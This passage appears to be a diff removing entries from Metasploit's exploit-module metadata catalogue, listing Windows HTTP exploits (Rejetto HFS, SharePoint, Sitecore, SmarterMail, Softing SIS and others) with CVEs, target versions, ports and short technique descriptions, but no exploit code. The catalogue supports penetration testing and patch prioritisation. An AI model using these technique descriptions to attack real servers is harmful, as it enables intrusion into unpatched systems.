Users are recommended to upgrade to newer supported versions.", - "references": [ - "CVE-2024-23692", - "URL-https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2024-06-11 16:26:04 +0000", - "path": "/modules/exploits/windows/http/rejetto_hfs_rce_cve_2024_23692.rb", - "is_install_path": true, - "ref_name": "windows/http/rejetto_hfs_rce_cve_2024_23692", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sambar6_search_results": { - "name": "Sambar 6 Search Results Buffer Overflow", - "fullname": "exploit/windows/http/sambar6_search_results", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-06-21", - "type": "exploit", - "author": [ - "hdm ", - "Andrew Griffiths ", - "aushack " - ], - "description": "This module exploits a buffer overflow found in the\n /search/results.stm application that comes with Sambar 6.\n This code is a direct port of Andrew Griffiths's SMUDGE\n exploit, the only changes made were to the nops and payload.\n This exploit causes the service to die, whether you provided\n the correct target or not.", - "references": [ - "CVE-2004-2086", - "OSVDB-5786", - "BID-9607" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000", - "Windows XP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sambar6_search_results.rb", - "is_install_path": true, - "ref_name": 
"windows/http/sambar6_search_results", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sap_configservlet_exec_noauth": { - "name": "SAP ConfigServlet Remote Code Execution", - "fullname": "exploit/windows/http/sap_configservlet_exec_noauth", - "aliases": [], - "rank": 500, - "disclosure_date": "2012-11-01", - "type": "exploit", - "author": [ - "Dmitry Chastuhin", - "Andras Kabai" - ], - "description": "This module allows remote code execution via operating system commands through the\n SAP ConfigServlet without any authentication. This module has been tested successfully\n with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.", - "references": [ - "OSVDB-92704", - "EDB-24996", - "URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 50000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows generic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb", - "is_install_path": true, - "ref_name": "windows/http/sap_configservlet_exec_noauth", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/sap_host_control_cmd_exec": { - "name": "SAP NetWeaver HostControl Command Injection", - "fullname": "exploit/windows/http/sap_host_control_cmd_exec", - "aliases": [], - "rank": 200, - "disclosure_date": "2012-08-14", - "type": "exploit", - "author": [ - "Michael Jordon", - "juan vazquez " - ], - "description": "This module exploits a command injection vulnerability in the SAPHostControl\n Service, by sending a specially crafted SOAP request to the management 
console.\n\n In order to deal with the spaces and length limitations, a WebDAV service is\n created to run an arbitrary payload when accessed as a UNC path. Because of this,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n It is enabled and automatically started by default on Windows XP SP3, but disabled\n by default on Windows 2003 SP2.", - "references": [ - "OSVDB-84821", - "URL-http://www.contextis.com/research/blog/sap4/", - "URL-https://websmp130.sap-ag.de/sap/support/notes/1341333" - ], - "platform": "Windows", - "arch": "", - "rport": 1128, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "SAP NetWeaver 7.02 SP6 / Windows with WebClient enabled" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/http/sap_host_control_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/sap_host_control_cmd_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sapdb_webtools": { - "name": "SAP DB 7.4 WebTools Buffer Overflow", - "fullname": "exploit/windows/http/sapdb_webtools", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-07-05", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in SAP DB 7.4 WebTools.\n By sending an overly long GET request, it may be possible for\n an attacker to execute arbitrary code.", - "references": [ - "CVE-2007-3614", - "OSVDB-37838", - "BID-24773" - ], - "platform": "Windows", - "arch": "", - "rport": 9999, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "SAP DB 7.4 WebTools" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 
"/modules/exploits/windows/http/sapdb_webtools.rb", - "is_install_path": true, - "ref_name": "windows/http/sapdb_webtools", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/savant_31_overflow": { - "name": "Savant 3.1 Web Server Overflow", - "fullname": "exploit/windows/http/savant_31_overflow", - "aliases": [], - "rank": 500, - "disclosure_date": "2002-09-10", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Savant 3.1 Web Server. The service\n supports a maximum of 10 threads (for a default install). Each exploit attempt\n generally causes a thread to die whether successful or not. Therefore, in a default\n configuration, you only have 10 chances.\n\n Due to the limited space available for the payload in this exploit module, use of the\n \"ord\" payloads is recommended.", - "references": [ - "CVE-2002-1120", - "OSVDB-9829", - "BID-5686", - "EDB-787" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Universal Savant.exe", - "Windows 2000 Pro All - English", - "Windows 2000 Pro All - Italian", - "Windows 2000 Pro All - French", - "Windows XP Pro SP2 - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/savant_31_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/savant_31_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sepm_auth_bypass_rce": { - "name": "Symantec Endpoint Protection Manager Authentication Bypass and Code Execution", - "fullname": "exploit/windows/http/sepm_auth_bypass_rce", - "aliases": [], - "rank": 
600, - "disclosure_date": "2015-07-31", - "type": "exploit", - "author": [ - "Markus Wulftange", - "bperry" - ], - "description": "This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager\n in order to achieve a remote shell on the box as NT AUTHORITY\\SYSTEM. The vulnerabilities\n include an authentication bypass, a directory traversal and a privilege escalation to\n get privileged code execution.", - "references": [ - "CVE-2015-1486", - "CVE-2015-1487", - "CVE-2015-1489", - "URL-http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html" - ], - "platform": "Windows", - "arch": "", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/sepm_auth_bypass_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/sepm_auth_bypass_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/serviio_checkstreamurl_cmd_exec": { - "name": "Serviio Media Server checkStreamUrl Command Execution", - "fullname": "exploit/windows/http/serviio_checkstreamurl_cmd_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-03", - "type": "exploit", - "author": [ - "Gjoko Krstic(LiquidWorm) ", - "bcoles " - ], - "description": "This module exploits an unauthenticated remote command execution vulnerability\n in the console component of Serviio Media Server versions 1.4 to 1.8 on\n Windows operating systems.\n\n The console service (on port 23423 by default) exposes a REST API which\n which does not require authentication.\n\n The 'action' API endpoint does not sufficiently sanitize user-supplied data\n in the 'VIDEO' parameter of the 'checkStreamUrl' method. 
This parameter is\n used in a call to cmd.exe resulting in execution of arbitrary commands.\n\n This module has been tested successfully on Serviio Media Server versions\n 1.4.0, 1.5.0, 1.6.0 and 1.8.0 on Windows 7.", - "references": [ - "OSVDB-41961", - "PACKETSTORM-142387", - "URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5408.php", - "URL-https://blogs.securiteam.com/index.php/archives/3094" - ], - "platform": "Windows", - "arch": "", - "rport": 23423, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/serviio_checkstreamurl_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/serviio_checkstreamurl_cmd_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/servu_session_cookie": { - "name": "Rhinosoft Serv-U Session Cookie Buffer Overflow", - "fullname": "exploit/windows/http/servu_session_cookie", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-11-01", - "type": "exploit", - "author": [ - "Nikolas Rangos ", - "M.Yanagishita ", - "jduck " - ], - "description": "This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.\n Sending a specially crafted POST request with an overly long session cookie\n string, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2009-4006", - "OSVDB-59772", - "URL-http://rangos.de/ServU-ADV.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2003 SP2 English (NX)", - "Windows 2000 SP4 and XP SP3 English (SEH)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/servu_session_cookie.rb", - 
"is_install_path": true, - "ref_name": "windows/http/servu_session_cookie", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sharepoint_data_deserialization": { - "name": "SharePoint DataSet / DataTable Deserialization", - "fullname": "exploit/windows/http/sharepoint_data_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-07-14", - "type": "exploit", - "author": [ - "Steven Seeley", - "Soroush Dalili", - "Spencer McIntyre" - ], - "description": "A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated\n attacker to execute code within the context of the SharePoint application service. The privileges in this\n execution context are determined by the account that is specified when SharePoint is installed and configured.\n The vulnerability is related to a failure to validate the source of XML input data, leading to an unsafe\n deserialization operation that can be triggered from a page that initializes either the\n ContactLinksSuggestionsMicroView type or a derivative of it. 
In a default configuration, a Domain User account\n is sufficient to access SharePoint and exploit this vulnerability.", - "references": [ - "CVE-2020-1147", - "URL-https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows EXE Dropper", - "Windows Command", - "Windows Powershell" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/http/sharepoint_data_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/http/sharepoint_data_deserialization", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce": { - "name": "Sharepoint Dynamic Proxy Generator Unauth RCE", - "fullname": "exploit/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-05-01", - "type": "exploit", - "author": [ - "Jang", - "jheysel-r7" - ], - "description": "This module exploits two vulnerabilities in Sharepoint 2019, an auth bypass CVE-2023-29357 which was patched\n in June of 2023 and CVE-2023-24955, an RCE which was patched in May of 2023.\n\n The auth bypass allows attackers to impersonate the Sharepoint Admin user. This vulnerability stems from the\n signature validation check used to verify JSON Web Tokens (JWTs) used for OAuth authentication. 
If the signing\n algorithm of the user-provided JWT is set to none, SharePoint skips the signature validation step due to a logic\n flaw in the ReadTokenCore() method.\n\n After impersonating the administrator user, the attacker has access to the Sharepoint API and is able to\n exploit CVE-2023-24955. This authenticated RCE vulnerability leverages the impersonated privileged account to\n replace the \"/BusinessDataMetadataCatalog/BDCMetadata.bdcm\" file in the webroot directory with a payload. The\n payload is then compiled and executed by Sharepoint allowing attackers to remotely execute commands via the API.", - "references": [ - "URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-may-9-2023-kb5002389-e2b77a46-2946-495f-8948-8abdc44aacc3", - "URL-https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-server-2019-june-13-2023-kb5002402-c5d58925-f7be-4d16-a61b-8ce871bbe34d", - "URL-https://testbnull.medium.com/p2o-vancouver-2023-v%C3%A0i-d%C3%B2ng-v%E1%BB%81-sharepoint-pre-auth-rce-chain-cve-2023-29357-cve-2023-24955-ed97dcab131e", - "CVE-2023-29357", - "CVE-2023-24955" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2024-02-15 09:26:54 +0000", - "path": "/modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - 
"exploit_windows/http/sharepoint_ssi_viewstate": { - "name": "Microsoft SharePoint Server-Side Include and ViewState RCE", - "fullname": "exploit/windows/http/sharepoint_ssi_viewstate", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-10-13", - "type": "exploit", - "author": [ - "mr_me", - "wvu " - ], - "description": "This module exploits a server-side include (SSI) in SharePoint to leak\n the web.config file and forge a malicious ViewState with the extracted\n validation key.\n\n This exploit is authenticated and requires a user with page creation\n privileges, which is a standard permission in SharePoint.\n\n The web.config file will be stored in loot once retrieved, and the\n VALIDATION_KEY option can be set to short-circuit the SSI and trigger\n the ViewState deserialization.\n\n Tested against SharePoint 2019 on Windows Server 2016.", - "references": [ - "CVE-2020-16952", - "URL-https://srcincite.io/advisories/src-2020-0022/", - "URL-https://srcincite.io/pocs/cve-2020-16952.py.txt", - "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb", - "is_install_path": true, - "ref_name": "windows/http/sharepoint_ssi_viewstate", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sharepoint_unsafe_control": { - "name": "Microsoft SharePoint 
Unsafe Control and ViewState RCE", - "fullname": "exploit/windows/http/sharepoint_unsafe_control", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-05-11", - "type": "exploit", - "author": [ - "Unknown", - "Spencer McIntyre", - "wvu " - ], - "description": "The EditingPageParser.VerifyControlOnSafeList method fails to properly validate user supplied data. This\n can be leveraged by an attacker to leak sensitive information in rendered-preview content. This module will\n leak the ViewState validation key and then use it to sign a crafted object that will trigger code execution\n when deserialized.\n\n Tested against SharePoint 2019 and SharePoint 2016, both on Windows Server 2016.", - "references": [ - "CVE-2021-31181", - "ZDI-21-573", - "URL-https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/exploits/windows/http/sharepoint_unsafe_control.rb", - "is_install_path": true, - "ref_name": "windows/http/sharepoint_unsafe_control", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sharepoint_workflows_xoml": { - "name": "SharePoint Workflows XOML Injection", - "fullname": "exploit/windows/http/sharepoint_workflows_xoml", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-03-02", - "type": "exploit", - "author": [ - "Spencer McIntyre", - 
"Soroush Dalili" - ], - "description": "This module exploits a vulnerability within SharePoint and its .NET backend\n that allows an attacker to execute commands using specially crafted XOML data\n sent to SharePoint via the Workflows functionality.", - "references": [ - "CVE-2020-0646", - "URL-https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows EXE Dropper", - "Windows Command", - "Windows Powershell" - ], - "mod_time": "2023-02-08 15:20:32 +0000", - "path": "/modules/exploits/windows/http/sharepoint_workflows_xoml.rb", - "is_install_path": true, - "ref_name": "windows/http/sharepoint_workflows_xoml", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/shoutcast_format": { - "name": "SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow", - "fullname": "exploit/windows/http/shoutcast_format", - "aliases": [], - "rank": 200, - "disclosure_date": "2004-12-23", - "type": "exploit", - "author": [ - "MC ", - "mandragore " - ], - "description": "This module exploits a format string vulnerability in the\n Nullsoft SHOUTcast server for Windows. The vulnerability is\n triggered by requesting a file path that contains format\n string specifiers. 
This vulnerability was discovered by\n Tomasz Trojanowski and Damian Put.", - "references": [ - "CVE-2004-1373", - "OSVDB-12585", - "BID-12096" - ], - "platform": "Windows", - "arch": "", - "rport": 8000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Windows NT SP5/SP6a English", - "Windows 2000 English ALL", - "Windows XP Pro SP0/SP1 English", - "Windows 2003 Server English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/shoutcast_format.rb", - "is_install_path": true, - "ref_name": "windows/http/shoutcast_format", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/shttpd_post": { - "name": "SHTTPD URI-Encoded POST Request Overflow", - "fullname": "exploit/windows/http/shttpd_post", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-10-06", - "type": "exploit", - "author": [ - "LMH ", - "hdm ", - "skOd" - ], - "description": "This module exploits a stack buffer overflow in SHTTPD <= 1.34.\n The vulnerability is caused due to a boundary error within the\n handling of POST requests. 
Based on an original exploit by skOd\n but using a different method found by hdm.", - "references": [ - "CVE-2006-5216", - "OSVDB-29565", - "URL-http://shttpd.sourceforge.net", - "BID-20393" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows NT English SP5-SP6", - "Windows 2000 Spanish SP4", - "Windows 2000 French SP4", - "Windows 2000 English SP0-SP4", - "Windows 2000 French SP0-SP4", - "Windows 2003 Server English SP0-SP1", - "Windows XP German SP2", - "Windows XP German SP1", - "Windows XP English SP2", - "Windows XP English SP0-SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/shttpd_post.rb", - "is_install_path": true, - "ref_name": "windows/http/shttpd_post", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sitecore_xp_cve_2021_42237": { - "name": "Sitecore Experience Platform (XP) PreAuth Deserialization RCE", - "fullname": "exploit/windows/http/sitecore_xp_cve_2021_42237", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-11-02", - "type": "exploit", - "author": [ - "AssetNote", - "gwillcox-r7" - ], - "description": "This module exploits a deserialization vulnerability in the Report.ashx page\n of Sitecore XP 7.5 to 7.5.2, 8.0 to 8.0.7, 8.1 to 8.1.3, and 8.2 to 8.2.7.\n Versions 7.2.6 and earlier and 9.0 and later are not affected.\n\n The vulnerability occurs due to Report.ashx's handler, located in Sitecore.Xdb.Client.dll\n under the Sitecore.sitecore.shell.ClientBin.Reporting.Report defintion, having a ProcessRequest()\n handler that calls ProcessReport() with the context of the attacker's request without properly\n checking if the attacker is authenticated or not.\n\n This request then causes ReportDataSerializer.DeserializeQuery() to be called, which will\n end up calling the 
DeserializeParameters() function of\n Sitecore.Analytics.Reporting.ReportDataSerializer, if a \"parameters\" XML tag is found in\n the attacker's request.\n\n Then for each subelement named \"parameter\", the code will check that it has a name and\n if it does, it will call NetDataContractSerializer().ReadObject on it. NetDataContractSerializer is\n vulnerable to deserialization attacks and can be trivially exploited by using the\n TypeConfuseDelegate gadget chain.\n\n By exploiting this vulnerability, an attacker can gain arbitrary code execution as the user\n that IIS is running as, aka NT AUTHORITY\\NETWORK SERVICE. Users can then use technique 4\n of the \"getsystem\" command to use RPCSS impersonation and get SYSTEM level code execution.", - "references": [ - "CVE-2021-42237", - "URL-https://blog.assetnote.io/2021/11/02/sitecore-rce/", - "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2021-11-11 23:56:11 +0000", - "path": "/modules/exploits/windows/http/sitecore_xp_cve_2021_42237.rb", - "is_install_path": true, - "ref_name": "windows/http/sitecore_xp_cve_2021_42237", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/sitecore_xp_cve_2025_27218": { - "name": "Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit", - "fullname": "exploit/windows/http/sitecore_xp_cve_2025_27218", - "aliases": [], - "rank": 600, - "disclosure_date": "2025-01-06", - 
"type": "exploit", - "author": [ - "Dylan Pindur", - "machang-r7" - ], - "description": "This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience\n Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.", - "references": [ - "CVE-2025-27218", - "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535", - "URL-https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218" - ], - "platform": "Windows", - "arch": "x86, x64, cmd", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "PowerShell Stager" - ], - "mod_time": "2025-03-27 09:36:10 +0000", - "path": "/modules/exploits/windows/http/sitecore_xp_cve_2025_27218.rb", - "is_install_path": true, - "ref_name": "windows/http/sitecore_xp_cve_2025_27218", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/smartermail_rce": { - "name": "SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution", - "fullname": "exploit/windows/http/smartermail_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-04-17", - "type": "exploit", - "author": [ - "Soroush Dalili", - "1F98D", - "Ismail E. Dawoodjee" - ], - "description": "This module exploits a vulnerability in the SmarterTools SmarterMail\n software for version numbers <= 16.x or for build numbers < 6985.\n The vulnerable versions and builds expose three .NET remoting endpoints\n on port 17001, namely /Servers, /Mail and /Spool. 
For example, a\n typical installation of SmarterMail Build 6970 will have the /Servers\n endpoint exposed to the public at tcp://0.0.0.0:17001/Servers, where\n serialized .NET commands can be sent through a TCP socket connection.\n\n The three endpoints perform deserialization of untrusted data\n (CVE-2019-7214), allowing an attacker to send arbitrary commands\n to be deserialized and executed. This module exploits this vulnerability\n to perform .NET deserialization attacks, allowing remote code execution\n for any unauthenticated user under the context of the SYSTEM account.\n Successful exploitation results in full administrative control of the\n target server under the NT AUTHORITY\\SYSTEM account.\n\n This vulnerability was patched in Build 6985, where the 17001 port is\n no longer publicly accessible, although it can be accessible locally\n at 127.0.0.1:17001. Hence, this would still allow for a privilege\n escalation vector if the server is compromised as a low-privileged user.", - "references": [ - "CVE-2019-7214", - "EDB-49216", - "URL-https://research.nccgroup.com/2019/04/16/technical-advisory-multiple-vulnerabilities-in-smartermail/" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 9998, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "x86/x64 Windows CmdStager" - ], - "mod_time": "2023-07-09 07:25:09 +0000", - "path": "/modules/exploits/windows/http/smartermail_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/smartermail_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/softing_sis_rce": { - "name": "Softing Secure 
Integration Server v1.22 Remote Code Execution", - "fullname": "exploit/windows/http/softing_sis_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-07-27", - "type": "exploit", - "author": [ - "Chris Anastasio (muffin) of Incite Team", - "Steven Seeley (mr_me) of Incite Team", - "Imran E. Dawoodjee " - ], - "description": "This module chains two vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.\n\n In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the \"restore configuration\" feature to upload a zip file containing a path traversal file which is a dll called ..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll. This causes the file C:\\Windows\\System32\\wbem\\wbemcomn.dll to be created and executed upon touching the disk.\n\n In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.\n\n The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication.\n\n A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. 
